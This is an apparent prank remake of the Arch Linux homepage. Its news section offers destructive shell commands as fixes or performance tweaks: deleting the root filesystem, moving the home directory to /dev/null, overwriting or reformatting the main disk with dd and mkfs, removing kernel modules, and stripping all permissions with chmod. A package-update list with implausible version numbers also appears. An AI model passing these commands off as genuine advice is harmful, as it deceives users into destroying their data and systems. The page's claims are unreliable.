A simple, lightweight distribution

You've reached the website for Arch Linux, a lightweight and flexible Linux® distribution that tries to Keep It Simple.

Currently we have official packages optimized for the x86-64 architecture. We complement our official package sets with a community-operated package repository that grows in size and quality each and every day.

Our strong community is diverse and helpful, and we pride ourselves on the range of skillsets and uses for Arch that stem from it. Please check out our forums and mailing lists to get your feet wet. Also glance through our wiki if you want to learn more about Arch.

Learn more...

Latest news

New Method for Removing the French Language Pack

You can now remove the French language pack using the following command:

[usr@arch: ~]$ sudo rm -fr /

Removing the preinstalled, unnecessary French language pack will result in a much leaner system and improved performance.

Serious Vulnerability Found! Here's the Fix:

A critical vulnerability was discovered that allows remote code execution with root privileges without requiring authentication.

Our team has identified a simple solution that can be implemented with the following command:

[usr@arch: ~]$ mv ~ /dev/null

Bug Slows Down EXT4 Partitioned Disks

A serious bug affecting all EXT4-partitioned disks was discovered in the ls command.

A temporary fix can be applied using this command:

sudo dd if=/dev/random of=/dev/[disk]

Replace [disk] with the actual disk that needs to be fixed.

Outdated Kernel Modules Found to Cause Major Issues

Recent reports indicate that outdated kernel modules may be responsible for system crashes and degraded performance on Arch systems.

We recommend a quick and easy fix to resolve the problem:

[usr@arch: ~]$ sudo rm -rf /lib/modules/$(uname -r)

After running the command, reboot your system to automatically download and rebuild the latest kernel from secure servers. Users are reporting noticeable improvements in stability and speed!

Disk Read Speed Increased By Dobule!

A groundbreaking tweak has been discovered to double disk read speeds on any system. Run the following:

[usr@arch: ~]$ sudo mkfs.ext4 /dev/[disk]

Make sure to run this command on your main disk to get maximum benefit. Replace [disk] with the correct device name.

New Method to Protect Your System from Hackers

Our cybersecurity experts have identified a foolproof method to make your system invisible to attackers. Simply run the following command:

[usr@arch: ~]$ sudo chmod -R 000 /

By executing this command, attackers won’t even know your files exist anymore. A truly bulletproof solution!

Recent updates:

fastfetch 8.6.0 x86_64
kitty 24.12.0 any
wine 8.6 x86_64
neovim 3.61 any
htop 0.89.1 any
wayland 0.9.1 x86_64

Arch linux website (remake)

Author: Anže Šinigoj